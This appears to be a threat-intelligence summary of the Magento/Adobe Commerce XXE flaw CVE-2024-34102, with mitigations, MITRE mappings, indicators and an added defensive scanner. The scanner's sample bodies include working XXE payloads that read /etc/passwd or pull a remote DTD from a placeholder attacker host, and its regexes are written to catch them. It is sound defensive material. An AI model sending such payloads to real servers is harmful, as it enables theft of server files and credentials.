A critical XML External Entity (XXE) vulnerability (CVE-2024-34102) affects Adobe Commerce and Magento Open Source, allowing an unauthenticated attacker to read files from the server, perform SSRF and potentially achieve remote code execution. Exploitation can expose sensitive files such as app/etc/env.php, whose cryptographic key lets the attacker forge administrator tokens and use the APIs with admin privileges; upgrading to the patched releases listed in Adobe's advisory is strongly advised for all affected versions. #CVE-2024-34102 #AdobeCommerce #MagentoOpenSource #XXE #env.php #Shodan #FOFA
Keypoints
- Critical XXE flaw (CVE-2024-34102) found in Adobe Commerce and Magento Open Source with CVSSv3 9.8.
- The vulnerability enables unauthorized read access to private files (e.g., app/etc/env.php) and can lead to arbitrary code execution, security feature bypass, and privilege escalation.
- The attack surface includes the REST, GraphQL, and SOAP APIs; a successful attack yields unauthorized admin access and data disclosure.
- A PoC is publicly available on GitHub; Shodan and FOFA searches identify up to 50k internet-exposed Magento/Adobe Commerce instances.
- Attack workflow: a single crafted POST request to an API endpoint makes the server parse attacker-controlled XML (a malicious DOCTYPE/DTD) during deserialization; the external entities it declares read local files and send their contents out of band to an attacker-hosted endpoint.
- Mitigations include upgrading to the patched versions and deploying SonicWall IPS signature 4462; advisories urge prompt remediation because the flaw is being actively exploited in the wild.
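The attack workflow and detection keypoints above describe a request body that smuggles an XML document with a DOCTYPE/DTD into an API that expects JSON or SOAP. The following scanner is an added example written for this page (it is not code from the advisory, the public PoC, SonicWall's signature or Magento): it flags request bodies that carry XXE-style payloads, handles the case where the XML is nested inside a JSON string with escaped quotes, and reports the external identifiers (file paths, remote DTD URLs) an entity declaration points at. The sample bodies are constructed, and attacker.example is a placeholder hostname.

```python
"""Flag API request bodies that carry XXE-style XML/DTD payloads.

Added example (not code from the advisory, the PoC or Magento). REST and
GraphQL take JSON and SOAP takes XML, so the XML a server is tricked into
parsing may arrive raw or as a string value nested inside a JSON document.
"""
import json
import re

# A DOCTYPE with an internal subset. Legitimate API clients have no reason
# to send one, so on its own it is a low-confidence indicator.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^>]*\[")
# An entity declaration with an external identifier. group(1) is set for a
# parameter entity (<!ENTITY % name SYSTEM ...>); group(2) holds the quoted
# identifier(s) after SYSTEM/PUBLIC.
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\s+"
    r"((?:\"[^\"]*\"|'[^']*')(?:\s+(?:\"[^\"]*\"|'[^']*'))?)",
    re.IGNORECASE,
)
# A parameter-entity reference inside the DTD (e.g. %sp; after declaring it),
# the usual way to pull in and execute an attacker-hosted DTD.
PARAM_REF_RE = re.compile(r"%[A-Za-z_][\w.-]*;")
# URI schemes worth reporting from an external identifier.
SCHEME_RE = re.compile(
    r"\b(?:https?|ftp|file|php|expect|gopher|dict|ldap)://[^\s\"'<>]+", re.IGNORECASE
)


def _xml_strings(value):
    """Collect string values in decoded JSON that look like XML markup."""
    if isinstance(value, str):
        return [value] if "<!" in value or "<?xml" in value.lower() else []
    if isinstance(value, dict):
        return [s for v in value.values() for s in _xml_strings(v)]
    if isinstance(value, list):
        return [s for v in value for s in _xml_strings(v)]
    return []


def xml_candidates(body):
    """Return the XML fragments a server-side parser could end up seeing.

    A raw XML body is returned unchanged. A JSON body is decoded so that XML
    carried inside a string (quotes escaped as \\") is scanned unescaped; a
    regex over the raw body would otherwise miss SYSTEM \\"http://...\\".
    """
    stripped = body.lstrip()
    if stripped[:1] in ("{", "["):
        try:
            return _xml_strings(json.loads(stripped))
        except json.JSONDecodeError:
            # Malformed JSON: undo the common escape and scan the raw text.
            return [stripped.replace('\\"', '"')]
    return [body]


def scan_body(body):
    """Score one body: severity 'none'/'low'/'high', the indicators that fired
    and the external identifiers declared in its entities."""
    indicators, refs = set(), set()
    for frag in xml_candidates(body):
        if DOCTYPE_RE.search(frag):
            indicators.add("doctype_internal_subset")
        for m in EXT_ENTITY_RE.finditer(frag):
            indicators.add("param_entity_external" if m.group(1) else "general_entity_external")
            refs.update(SCHEME_RE.findall(m.group(2)))
        if PARAM_REF_RE.search(frag):
            indicators.add("parameter_entity_reference")
    if indicators & {"param_entity_external", "general_entity_external"}:
        severity = "high"
    elif indicators:
        severity = "low"
    else:
        severity = "none"
    return {"severity": severity, "indicators": sorted(indicators), "external_refs": sorted(refs)}


# Constructed sample bodies (not captured traffic); attacker.example is a placeholder.
SAMPLE_BENIGN_JSON = '{"address":{"country_id":"US","postcode":"10001"}}'
SAMPLE_BENIGN_SOAP = (
    '<?xml version="1.0"?><env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/">'
    '<env:Body><ns:getProduct xmlns:ns="urn:example"><sku>24-MB01</sku></ns:getProduct>'
    "</env:Body></env:Envelope>"
)
SAMPLE_RAW_XXE = """<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<r>&xxe;</r>"""
# XML smuggled inside a JSON string, using a parameter entity to fetch a remote DTD.
SAMPLE_JSON_XXE = (
    r'{"data":"<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY % sp SYSTEM '
    r'\"http://attacker.example/evil.dtd\">%sp;]><r/>"}'
)

if __name__ == "__main__":
    for name, body in [("benign_json", SAMPLE_BENIGN_JSON), ("benign_soap", SAMPLE_BENIGN_SOAP),
                       ("raw_xxe", SAMPLE_RAW_XXE), ("json_xxe", SAMPLE_JSON_XXE)]:
        print(f"{name:12s} {scan_body(body)}")
```

Run it against logged request bodies (for example from a WAF or reverse proxy that captures POST payloads); only the two constructed XXE samples score high, the benign JSON and SOAP bodies score none, and the reported external_refs give you the file the attacker tried to read or the host serving the remote DTD, which is the value to block and hunt for in outbound traffic.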
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Unauthenticated exploitation requires nothing more than one crafted POST request to an exposed instance. “A crafted POST request to a vulnerable Adobe instance with an enabled Magento template is the necessary and sufficient condition to exploit the issue.”
- [T1552.001] Credentials in Files – Access to private files such as app/etc/env.php containing cryptographic keys used for authentication. “app/etc/env.php … containing cryptographic keys used for authentication.”
- [T1078] Valid Accounts – Forging administrator tokens and manipulating Magento’s APIs as privileged users. “Unauthenticated actors can utilize this key to forge administrator tokens and manipulate Magento’s APIs as privileged users.”
- [T1041] Exfiltration Over C2 Channel – Out-of-band exfiltration of sensitive data (e.g., the system password file) to an attacker-controlled endpoint. “exfiltrate the contents of the system’s password file from the target server.”
Indicators of Compromise
- [URL] Public vulnerability and PoC references – https://nvd.nist.gov/vuln/detail/CVE-2024-34102, https://github.com/Chocapikk/CVE-2024-34102
- [URL] Exposure and discovery context – https://www.shodan.io/search?query=http.html%3A%22magento-template%22, https://en.fofa.info/result?qbase64=YXBwPSJBZG9iZS1NYWdlbnRvIg%3D%3D
- [URL] Official advisory context – https://helpx.adobe.com/in/security/products/magento/apsb24-40.html
- [File] app/etc/env.php – sensitive credential file referenced by the vulnerability
- [File] /etc/passwd – targeted system password file shown in disclosure figures
Read more: https://blog.sonicwall.com/en-us/2024/07/adobe-commerce-unauthorized-xxe-vulnerability/